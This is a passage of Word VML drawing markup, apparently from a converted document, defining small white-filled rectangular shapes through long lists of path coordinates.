2785,5106,2785,5105,2785,5104,2785,5103,2785,5101,2785,5100,2785,5099,2785,5097,2785,5095,2785,5094,2785,5092,2785,5091,2785,5089,2785,5087,2785,5085,2785,5083,2785,5081,2785,5079,2785,5077,2785,5075,2785,5072,2785,5070,2785,5068,2785,5065,2785,5063,2785,5060,2785,5057,2785,5055,2785,5052,2785,5049,2785,5046,2785,5043,2785,5040,2785,5037,2785,5034,2785,5030,2785,5027,2785,5023,2785,5020,2785,5016,2785,5012,2785,5009,2785,5005,2785,5001,2785,4997,2785,4993,2785,4988,2785,4984,2785,4980,2785,4975,2785,4971,2785,4966,2785,4961,2785,4956,2785,4951,2785,4946,2785,4941,2785,4936,2785,4931,2785,4925,2785,4920,2785,4914,2785,4908,2785,4902,2785,4896,2785,4890,2785,4884,2785,4878,2785,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:274.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,5490" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:5490;width:130;height:270" coordorigin="2290,5490" coordsize="130,270" path="m2305,5517l2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2305,5517,2306,5517,2306,5517,2306,5517,2306,5517,2306,5517,2306,5517,2306,5517,2306,5517,2306,5517,2306,5517,2307,5517,2307,5517,2307,5517,2307,5517,2307,5517,2307,5517,2308,5517,2308,5517,2308,5517,2308,5517,2309,5517,2309,5517,2309,5517,2310,5517,2310,5517,2310,5517,2311,5517,2311,5517,2312,5517,2312,5517,2313,5517,2313,5517,2314,5517,2314,5517,2315,5517,2315,5517,2316,5517,2316,5517,2317,5517,2318,5517,2318,5517,2319,5517,2320,5517,2321,5517,2321,5517,2322,5517,2323,5517,2324,5517,2325,5517,2326,5517,2327,5517,2328,5517,2329,5517,2330,5517,2331,5517,2332,5517,2333,5517,2334,5517,2335,5517,2336,5517,2338,5517,2339,5517,2340,5517,2342,5517,2343,5517,2344,5517,2346,5517,2347,5517,2349,5517,2350,5517,2352,5517,2354,5517,2355,5517,2357,5517,2359,5517,2361,5517,2362,5517,2364,5517,2366,5517,2368,5517,2370,5517,2372,5517,2374,5517,2376,5517,2379,5517,2381,5517,2383,5517,2385,5517,2388,5517,2390,5517,2392,5517,2395,5517,2397,5517,2400,5517,2403,5517,2405,5517,2408,5517,2411,5517,2414,5517,2416,5517,2419,5517,2422,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5517,2425,5518,2425,5518,2425,5518,2425,5518,2425,5518,2425,5518,2425,5519,2425,5519,2425,5519,2425,5519,2425,5520,2425,5520,2425,5520,2425,5521,2425,5521,2425,5522,2425,5522,2425,5523,2425,5523,2425,5524,2425,5524,2425,5525,2425,5526,2425,5526,2425,5527,2425,5528,2425,5529,2425,5530,2425,5531,2425,5532,2425,5532,2425,5534,2425,5535,2425,5536,2425,5537,2425,5538,2425,5539,2425,5541,2425,5542,2425,5543,2425,5545,2425,5546,2425,5548,2425,5549,2425,5551,2425,5553,2425,5555,2425,5556,2425,5558,2425,5560,2425,5562,2425,5564,2425,5567,2425,5569,2425,5571,2425,5573,2425,5576,2425,5578,2425,5581,2425,5583,2425,5586,2425,5589,2425,5591,2425,5594,2425,5597,2425,5600,2425,5603,2425,5607,2425,5610,2425,5613,2425,5616,2425,5620,2425,5624,2425,5627,2425,5631,2425,5635,2425,5639,2425,5643,2425,5647,2425,5651,2425,5655,2425,5659,2425,5664,2425,5668,2425,5673,2425,5677,2425,5682,2425,5687,2425,5692,2425,5697,2425,5702,2425,5707,2425,5713,2425,5718,2425,5724,2425,5729,2425,5735,2425,5741,2425,5747,2425,5753,2425,5759,2425,5766,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2425,5772,2424,5772,2424,5772,2424,5772,2424,5772,2424,5772,2424,5772,2424,5772,2423,5772,2423,5772,2423,5772,2423,5772,2423,5772,2422,5772,2422,5772,2422,5772,2422,5772,2421,5772,2421,5772,2421,5772,2420,5772,2420,5772,2420,5772,2419,5772,2419,5772,2418,5772,2418,5772,2417,5772,2417,5772,2416,5772,2416,5772,2415,5772,2415,5772,2414,5772,2413,5772,2413,5772,2412,5772,2411,5772,2411,5772,2410,5772,2409,5772,2408,5772,2407,5772,2407,5772,2406,5772,2405,5772,2404,5772,2403,5772,2402,5772,2401,5772,2400,5772,2399,5772,2398,5772,2396,5772,2395,5772,2394,5772,2393,5772,2391,5772,2390,5772,2389,5772,2387,5772,2386,5772,2384,5772,2383,5772,2381,5772,2380,5772,2378,5772,2377,5772,2375,5772,2373,5772,2372,5772,2370,5772,2368,5772,2366,5772,2364,5772,2362,5772,2360,5772,2358,5772,2356,5772,2354,5772,2352,5772,2350,5772,2347,5772,2345,5772,2343,5772,2340,5772,2338,5772,2335,5772,2333,5772,2330,5772,2328,5772,2325,5772,2322,5772,2320,5772,2317,5772,2314,5772,2311,5772,2308,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5772,2305,5771,2305,5771,2305,5771,2305,5771,2305,5771,2305,5771,2305,5771,2305,5771,2305,5770,2305,5770,2305,5770,2305,5770,2305,5769,2305,5769,2305,5769,2305,5768,2305,5768,2305,5767,2305,5767,2305,5766,2305,5766,2305,5765,2305,5765,2305,5764,2305,5764,2305,5763,2305,5762,2305,5761,2305,5761,2305,5760,2305,5759,2305,5758,2305,5757,2305,5756,2305,5755,2305,5754,2305,5753,2305,5752,2305,5751,2305,5749,2305,5748,2305,5747,2305,5745,2305,5744,2305,5742,2305,5741,2305,5739,2305,5738,2305,5736,2305,5734,2305,5732,2305,5730,2305,5728,2305,5726,2305,5724,2305,5722,2305,5720,2305,5718,2305,5715,2305,5713,2305,5711,2305,5708,2305,5705,2305,5703,2305,5700,2305,5697,2305,5694,2305,5691,2305,5688,2305,5685,2305,5682,2305,5679,2305,5676,2305,5672,2305,5669,2305,5665,2305,5662,2305,5658,2305,5654,2305,5650,2305,5646,2305,5642,2305,5638,2305,5634,2305,5629,2305,5625,2305,5621,2305,5616,2305,5611,2305,5606,2305,5602,2305,5597,2305,5592,2305,5586,2305,5581,2305,5576,2305,5570,2305,5565,2305,5559,2305,5553,2305,5548,2305,5542,2305,5536,2305,5529,2305,5523,2305,5517e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:274.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,5490" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:5490;width:130;height:270" coordorigin="2770,5490" coordsize="130,270" path="m2785,5517l2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2786,5517,2787,5517,2787,5517,2787,5517,2787,5517,2787,5517,2787,5517,2788,5517,2788,5517,2788,5517,2788,5517,2788,5517,2789,5517,2789,5517,2789,5517,2790,5517,2790,5517,2790,5517,2791,5517,2791,5517,2791,5517,2792,5517,2792,5517,2793,5517,2793,5517,2794,5517,2794,5517,2795,5517,2795,5517,2796,5517,2797,5517,2797,5517,2798,5517,2799,5517,2799,5517,2800,5517,2801,5517,2802,5517,2802,5517,2803,5517,2804,5517,2805,5517,2806,5517,2807,5517,2808,5517,2809,5517,2810,5517,2811,5517,2812,5517,2813,5517,2814,5517,2815,5517,2817,5517,2818,5517,2819,5517,2821,5517,2822,5517,2823,5517,2825,5517,2826,5517,2828,5517,2829,5517,2831,5517,2832,5517,2834,5517,2836,5517,2837,5517,2839,5517,2841,5517,2843,5517,2845,5517,2846,5517,2848,5517,2850,5517,2852,5517,2855,5517,2857,5517,2859,5517,2861,5517,2863,5517,2866,5517,2868,5517,2870,5517,2873,5517,2875,5517,2878,5517,2880,5517,2883,5517,2885,5517,2888,5517,2891,5517,2894,5517,2897,5517,2900,5517,2902,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5517,2905,5518,2905,5518,2905,5518,2905,5518,2905,5518,2905,5518,2905,5519,2905,5519,2905,5519,2905,5519,2905,5520,2905,5520,2905,5520,2905,5521,2905,5521,2905,5522,2905,5522,2905,5523,2905,5523,2905,5524,2905,5524,2905,5525,2905,5526,2905,5526,2905,5527,2905,5528,2905,5529,2905,5530,2905,5531,2905,5532,2905,5532,2905,5534,2905,5535,2905,5536,2905,5537,2905,5538,2905,5539,2905,5541,2905,5542,2905,5543,2905,5545,2905,5546,2905,5548,2905,5549,2905,5551,2905,5553,2905,5555,2905,5556,2905,5558,2905,5560,2905,5562,2905,5564,2905,5567,2905,5569,2905,5571,2905,5573,2905,5576,2905,5578,2905,5581,2905,5583,2905,5586,2905,5589,2905,5591,2905,5594,2905,5597,2905,5600,2905,5603,2905,5607,2905,5610,2905,5613,2905,5616,2905,5620,2905,5624,2905,5627,2905,5631,2905,5635,2905,5639,2905,5643,2905,5647,2905,5651,2905,5655,2905,5659,2905,5664,2905,5668,2905,5673,2905,5677,2905,5682,2905,5687,2905,5692,2905,5697,2905,5702,2905,5707,2905,5713,2905,5718,2905,5724,2905,5729,2905,5735,2905,5741,2905,5747,2905,5753,2905,5759,2905,5766,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2904,5772,2904,5772,2904,5772,2904,5772,2904,5772,2904,5772,2904,5772,2903,5772,2903,5772,2903,5772,2903,5772,2902,5772,2902,5772,2902,5772,2902,5772,2901,5772,2901,5772,2901,5772,2900,5772,2900,5772,2899,5772,2899,5772,2899,5772,2898,5772,2898,5772,2897,5772,2897,5772,2896,5772,2895,5772,2895,5772,2894,5772,2894,5772,2893,5772,2892,5772,2892,5772,2891,5772,2890,5772,2889,5772,2888,5772,2888,5772,2887,5772,2886,5772,2885,5772,2884,5772,2883,5772,2882,5772,2881,5772,2880,5772,2879,5772,2878,5772,2877,5772,2875,5772,2874,5772,2873,5772,2872,5772,2870,5772,2869,5772,2868,5772,2866,5772,2865,5772,2863,5772,2862,5772,2860,5772,2859,5772,2857,5772,2855,5772,2854,5772,2852,5772,2850,5772,2848,5772,2846,5772,2844,5772,2842,5772,2840,5772,2838,5772,2836,5772,2834,5772,2832,5772,2830,5772,2828,5772,2825,5772,2823,5772,2821,5772,2818,5772,2816,5772,2813,5772,2811,5772,2808,5772,2805,5772,2803,5772,2800,5772,2797,5772,2794,5772,2791,5772,2788,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5771,2785,5771,2785,5771,2785,5771,2785,5771,2785,5771,2785,5771,2785,5771,2785,5770,2785,5770,2785,5770,2785,5770,2785,5769,2785,5769,2785,5769,2785,5768,2785,5768,2785,5767,2785,5767,2785,5766,2785,5766,2785,5765,2785,5765,2785,5764,2785,5764,2785,5763,2785,5762,2785,5761,2785,5761,2785,5760,2785,5759,2785,5758,2785,5757,2785,5756,2785,5755,2785,5754,2785,5753,2785,5752,2785,5751,2785,5749,2785,5748,2785,5747,2785,5745,2785,5744,2785,5742,2785,5741,2785,5739,2785,5738,2785,5736,2785,5734,2785,5732,2785,5730,2785,5728,2785,5726,2785,5724,2785,5722,2785,5720,2785,5718,2785,5715,2785,5713,2785,5711,2785,5708,2785,5705,2785,5703,2785,5700,2785,5697,2785,5694,2785,5691,2785,5688,2785,5685,2785,5682,2785,5679,2785,5676,2785,5672,2785,5669,2785,5665,2785,5662,2785,5658,2785,5654,2785,5650,2785,5646,2785,5642,2785,5638,2785,5634,2785,5629,2785,5625,2785,5621,2785,5616,2785,5611,2785,5606,2785,5602,2785,5597,2785,5592,2785,5586,2785,5581,2785,5576,2785,5570,2785,5565,2785,5559,2785,5553,2785,5548,2785,5542,2785,5536,2785,5529,2785,5523,2785,5517e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:306.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,6130" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:6130;width:130;height:270" coordorigin="2290,6130" coordsize="130,270" path="m2305,6147l2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2305,6147,2306,6147,2306,6147,2306,6147,2306,6147,2306,6147,2306,6147,2306,6147,2306,6147,2306,6147,2306,6147,2307,6147,2307,6147,2307,6147,2307,6147,2307,6147,2307,6147,2308,6147,2308,6147,2308,6147,2308,6147,2309,6147,2309,6147,2309,6147,2310,6147,2310,6147,2310,6147,2311,6147,2311,6147,2312,6147,2312,6147,2313,6147,2313,6147,2314,6147,2314,6147,2315,6147,2315,6147,2316,6147,2316,6147,2317,6147,2318,6147,2318,6147,2319,6147,2320,6147,2321,6147,2321,6147,2322,6147,2323,6147,2324,6147,2325,6147,2326,6147,2327,6147,2328,6147,2329,6147,2330,6147,2331,6147,2332,6147,2333,6147,2334,6147,2335,6147,2336,6147,2338,6147,2339,6147,2340,6147,2342,6147,2343,6147,2344,6147,2346,6147,2347,6147,2349,6147,2350,6147,2352,6147,2354,6147,2355,6147,2357,6147,2359,6147,2361,6147,2362,6147,2364,6147,2366,6147,2368,6147,2370,6147,2372,6147,2374,6147,2376,6147,2379,6147,2381,6147,2383,6147,2385,6147,2388,6147,2390,6147,2392,6147,2395,6147,2397,6147,2400,6147,2403,6147,2405,6147,2408,6147,2411,6147,2414,6147,2416,6147,2419,6147,2422,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6147,2425,6148,2425,6148,2425,6148,2425,6148,2425,6148,2425,6148,2425,6148,2425,6148,2425,6149,2425,6149,2425,6149,2425,6149,2425,6150,2425,6150,2425,6150,2425,6151,2425,6151,2425,6152,2425,6152,2425,6153,2425,6153,2425,6154,2425,6154,2425,6155,2425,6155,2425,6156,2425,6157,2425,6158,2425,6158,2425,6159,2425,6160,2425,6161,2425,6162,2425,6163,2425,6164,2425,6165,2425,6166,2425,6167,2425,6168,2425,6170,2425,6171,2425,6172,2425,6174,2425,6175,2425,6177,2425,6178,2425,6180,2425,6181,2425,6183,2425,6185,2425,6187,2425,6189,2425,6191,2425,6193,2425,6195,2425,6197,2425,6199,2425,6201,2425,6204,2425,6206,2425,6208,2425,6211,2425,6214,2425,6216,2425,6219,2425,6222,2425,6225,2425,6228,2425,6231,2425,6234,2425,6237,2425,6240,2425,6243,2425,6247,2425,6250,2425,6254,2425,6257,2425,6261,2425,6265,2425,6269,2425,6273,2425,6277,2425,6281,2425,6285,2425,6290,2425,6294,2425,6298,2425,6303,2425,6308,2425,6313,2425,6317,2425,6322,2425,6327,2425,6333,2425,6338,2425,6343,2425,6349,2425,6354,2425,6360,2425,6366,2425,6371,2425,6377,2425,6383,2425,6390,2425,6396,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2425,6402,2424,6402,2424,6402,2424,6402,2424,6402,2424,6402,2424,6402,2424,6402,2423,6402,2423,6402,2423,6402,2423,6402,2423,6402,2422,6402,2422,6402,2422,6402,2422,6402,2421,6402,2421,6402,2421,6402,2420,6402,2420,6402,2420,6402,2419,6402,2419,6402,2418,6402,2418,6402,2417,6402,2417,6402,2416,6402,2416,6402,2415,6402,2415,6402,2414,6402,2413,6402,2413,6402,2412,6402,2411,6402,2411,6402,2410,6402,2409,6402,2408,6402,2407,6402,2407,6402,2406,6402,2405,6402,2404,6402,2403,6402,2402,6402,2401,6402,2400,6402,2399,6402,2398,6402,2396,6402,2395,6402,2394,6402,2393,6402,2391,6402,2390,6402,2389,6402,2387,6402,2386,6402,2384,6402,2383,6402,2381,6402,2380,6402,2378,6402,2377,6402,2375,6402,2373,6402,2372,6402,2370,6402,2368,6402,2366,6402,2364,6402,2362,6402,2360,6402,2358,6402,2356,6402,2354,6402,2352,6402,2350,6402,2347,6402,2345,6402,2343,6402,2340,6402,2338,6402,2335,6402,2333,6402,2330,6402,2328,6402,2325,6402,2322,6402,2320,6402,2317,6402,2314,6402,2311,6402,2308,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6402,2305,6401,2305,6401,2305,6401,2305,6401,2305,6401,2305,6401,2305,6400,2305,6400,2305,6400,2305,6400,2305,6399,2305,6399,2305,6399,2305,6398,2305,6398,2305,6397,2305,6397,2305,6396,2305,6396,2305,6395,2305,6395,2305,6394,2305,6393,2305,6393,2305,6392,2305,6391,2305,6390,2305,6389,2305,6388,2305,6387,2305,6387,2305,6385,2305,6384,2305,6383,2305,6382,2305,6381,2305,6380,2305,6378,2305,6377,2305,6376,2305,6374,2305,6373,2305,6371,2305,6370,2305,6368,2305,6366,2305,6364,2305,6363,2305,6361,2305,6359,2305,6357,2305,6355,2305,6352,2305,6350,2305,6348,2305,6346,2305,6343,2305,6341,2305,6338,2305,6336,2305,6333,2305,6330,2305,6328,2305,6325,2305,6322,2305,6319,2305,6316,2305,6312,2305,6309,2305,6306,2305,6303,2305,6299,2305,6295,2305,6292,2305,6288,2305,6284,2305,6280,2305,6276,2305,6272,2305,6268,2305,6264,2305,6260,2305,6255,2305,6251,2305,6246,2305,6242,2305,6237,2305,6232,2305,6227,2305,6222,2305,6217,2305,6212,2305,6206,2305,6201,2305,6195,2305,6190,2305,6184,2305,6178,2305,6172,2305,6166,2305,6160,2305,6153,2305,6147e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:306.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,6130" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:6130;width:130;height:270" coordorigin="2770,6130" coordsize="130,270" path="m2785,6147l2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2786,6147,2787,6147,2787,6147,2787,6147,2787,6147,2787,6147,2787,6147,2788,6147,2788,6147,2788,6147,2788,6147,2788,6147,2789,6147,2789,6147,2789,6147,2790,6147,2790,6147,2790,6147,2791,6147,2791,6147,2791,6147,2792,6147,2792,6147,2793,6147,2793,6147,2794,6147,2794,6147,2795,6147,2795,6147,2796,6147,2797,6147,2797,6147,2798,6147,2799,6147,2799,6147,2800,6147,2801,6147,2802,6147,2802,6147,2803,6147,2804,6147,2805,6147,2806,6147,2807,6147,2808,6147,2809,6147,2810,6147,2811,6147,2812,6147,2813,6147,2814,6147,2815,6147,2817,6147,2818,6147,2819,6147,2821,6147,2822,6147,2823,6147,2825,6147,2826,6147,2828,6147,2829,6147,2831,6147,2832,6147,2834,6147,2836,6147,2837,6147,2839,6147,2841,6147,2843,6147,2845,6147,2846,6147,2848,6147,2850,6147,2852,6147,2855,6147,2857,6147,2859,6147,2861,6147,2863,6147,2866,6147,2868,6147,2870,6147,2873,6147,2875,6147,2878,6147,2880,6147,2883,6147,2885,6147,2888,6147,2891,6147,2894,6147,2897,6147,2900,6147,2902,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6147,2905,6148,2905,6148,2905,6148,2905,6148,2905,6148,2905,6148,2905,6148,2905,6148,2905,6149,2905,6149,2905,6149,2905,6149,2905,6150,2905,6150,2905,6150,2905,6151,2905,6151,2905,6152,2905,6152,2905,6153,2905,6153,2905,6154,2905,6154,2905,6155,2905,6155,2905,6156,2905,6157,2905,6158,2905,6158,2905,6159,2905,6160,2905,6161,2905,6162,2905,6163,2905,6164,2905,6165,2905,6166,2905,6167,2905,6168,2905,6170,2905,6171,2905,6172,2905,6174,2905,6175,2905,6177,2905,6178,2905,6180,2905,6181,2905,6183,2905,6185,2905,6187,2905,6189,2905,6191,2905,6193,2905,6195,2905,6197,2905,6199,2905,6201,2905,6204,2905,6206,2905,6208,2905,6211,2905,6214,2905,6216,2905,6219,2905,6222,2905,6225,2905,6228,2905,6231,2905,6234,2905,6237,2905,6240,2905,6243,2905,6247,2905,6250,2905,6254,2905,6257,2905,6261,2905,6265,2905,6269,2905,6273,2905,6277,2905,6281,2905,6285,2905,6290,2905,6294,2905,6298,2905,6303,2905,6308,2905,6313,2905,6317,2905,6322,2905,6327,2905,6333,2905,6338,2905,6343,2905,6349,2905,6354,2905,6360,2905,6366,2905,6371,2905,6377,2905,6383,2905,6390,2905,6396,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2905,6402,2904,6402,2904,6402,2904,6402,2904,6402,2904,6402,2904,6402,2904,6402,2903,6402,2903,6402,2903,6402,2903,6402,2902,6402,2902,6402,2902,6402,2902,6402,2901,6402,2901,6402,2901,6402,2900,6402,2900,6402,2899,6402,2899,6402,2899,6402,2898,6402,2898,6402,2897,6402,2897,6402,2896,6402,2895,6402,2895,6402,2894,6402,2894,6402,2893,6402,2892,6402,2892,6402,2891,6402,2890,6402,2889,6402,2888,6402,2888,6402,2887,6402,2886,6402,2885,6402,2884,6402,2883,6402,2882,6402,2881,6402,2880,6402,2879,6402,2878,6402,2877,6402,2875,6402,2874,6402,2873,6402,2872,6402,2870,6402,2869,6402,2868,6402,2866,6402,2865,6402,2863,6402,2862,6402,2860,6402,2859,6402,2857,6402,2855,6402,2854,6402,2852,6402,2850,6402,2848,6402,2846,6402,2844,6402,2842,6402,2840,6402,2838,6402,2836,6402,2834,6402,2832,6402,2830,6402,2828,6402,2825,6402,2823,6402,2821,6402,2818,6402,2816,6402,2813,6402,2811,6402,2808,6402,2805,6402,2803,6402,2800,6402,2797,6402,2794,6402,2791,6402,2788,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6401,2785,6401,2785,6401,2785,6401,2785,6401,2785,6401,2785,6400,2785,6400,2785,6400,2785,6400,2785,6399,2785,6399,2785,6399,2785,6398,2785,6398,2785,6397,2785,6397,2785,6396,2785,6396,2785,6395,2785,6395,2785,6394,2785,6393,2785,6393,2785,6392,2785,6391,2785,6390,2785,6389,2785,6388,2785,6387,2785,6387,2785,6385,2785,6384,2785,6383,2785,6382,2785,6381,2785,6380,2785,6378,2785,6377,2785,6376,2785,6374,2785,6373,2785,6371,2785,6370,2785,6368,2785,6366,2785,6364,2785,6363,2785,6361,2785,6359,2785,6357,2785,6355,2785,6352,2785,6350,2785,6348,2785,6346,2785,6343,2785,6341,2785,6338,2785,6336,2785,6333,2785,6330,2785,6328,2785,6325,2785,6322,2785,6319,2785,6316,2785,6312,2785,6309,2785,6306,2785,6303,2785,6299,2785,6295,2785,6292,2785,6288,2785,6284,2785,6280,2785,6276,2785,6272,2785,6268,2785,6264,2785,6260,2785,6255,2785,6251,2785,6246,2785,6242,2785,6237,2785,6232,2785,6227,2785,6222,2785,6217,2785,6212,2785,6206,2785,6201,2785,6195,2785,6190,2785,6184,2785,6178,2785,6172,2785,6166,2785,6160,2785,6153,2785,6147e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:338.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,6770" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:6770;width:130;height:270" coordorigin="2290,6770" coordsize="130,270" path="m2305,6792l2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2305,6792,2306,6792,2306,6792,2306,6792,2306,6792,2306,6792,2306,6792,2306,6792,2306,6792,2306,6792,2306,6792,2307,6792,2307,6792,2307,6792,2307,6792,2307,6792,2307,6792,2308,6792,2308,6792,2308,6792,2308,6792,2309,6792,2309,6792,2309,6792,2310,6792,2310,6792,2310,6792,2311,6792,2311,6792,2312,6792,2312,6792,2313,6792,2313,6792,2314,6792,2314,6792,2315,6792,2315,6792,2316,6792,2316,6792,2317,6792,2318,6792,2318,6792,2319,6792,2320,6792,2321,6792,2321,6792,2322,6792,2323,6792,2324,6792,2325,6792,2326,6792,2327,6792,2328,6792,2329,6792,2330,6792,2331,6792,2332,6792,2333,6792,2334,6792,2335,6792,2336,6792,2338,6792,2339,6792,2340,6792,2342,6792,2343,6792,2344,6792,2346,6792,2347,6792,2349,6792,2350,6792,2352,6792,2354,6792,2355,6792,2357,6792,2359,6792,2361,6792,2362,6792,2364,6792,2366,6792,2368,6792,2370,6792,2372,6792,2374,6792,2376,6792,2379,6792,2381,6792,2383,6792,2385,6792,2388,6792,2390,6792,2392,6792,2395,6792,2397,6792,2400,6792,2403,6792,2405,6792,2408,6792,2411,6792,2414,6792,2416,6792,2419,6792,2422,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6792,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6793,2425,6794,2425,6794,2425,6794,2425,6794,2425,6795,2425,6795,2425,6795,2425,6795,2425,6796,2425,6796,2425,6797,2425,6797,2425,6797,2425,6798,2425,6798,2425,6799,2425,6799,2425,6800,2425,6801,2425,6801,2425,6802,2425,6803,2425,6804,2425,6804,2425,6805,2425,6806,2425,6807,2425,6808,2425,6809,2425,6810,2425,6811,2425,6813,2425,6814,2425,6815,2425,6816,2425,6818,2425,6819,2425,6820,2425,6822,2425,6824,2425,6825,2425,6827,2425,6829,2425,6830,2425,6832,2425,6834,2425,6836,2425,6838,2425,6840,2425,6842,2425,6844,2425,6847,2425,6849,2425,6851,2425,6854,2425,6856,2425,6859,2425,6862,2425,6864,2425,6867,2425,6870,2425,6873,2425,6876,2425,6879,2425,6882,2425,6885,2425,6889,2425,6892,2425,6896,2425,6899,2425,6903,2425,6907,2425,6910,2425,6914,2425,6918,2425,6922,2425,6926,2425,6931,2425,6935,2425,6939,2425,6944,2425,6948,2425,6953,2425,6958,2425,6963,2425,6968,2425,6973,2425,6978,2425,6983,2425,6988,2425,6994,2425,6999,2425,7005,2425,7011,2425,7017,2425,7023,2425,7029,2425,7035,2425,7041,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2425,7048,2424,7048,2424,7048,2424,7048,2424,7048,2424,7048,2424,7048,2424,7048,2423,7048,2423,7048,2423,7048,2423,7048,2423,7048,2422,7048,2422,7048,2422,7048,2422,7048,2421,7048,2421,7048,2421,7048,2420,7048,2420,7048,2420,7048,2419,7048,2419,7048,2418,7048,2418,7048,2417,7048,2417,7048,2416,7048,2416,7048,2415,7048,2415,7048,2414,7048,2413,7048,2413,7048,2412,7048,2411,7048,2411,7048,2410,7048,2409,7048,2408,7048,2407,7048,2407,7048,2406,7048,2405,7048,2404,7048,2403,7048,2402,7048,2401,7048,2400,7048,2399,7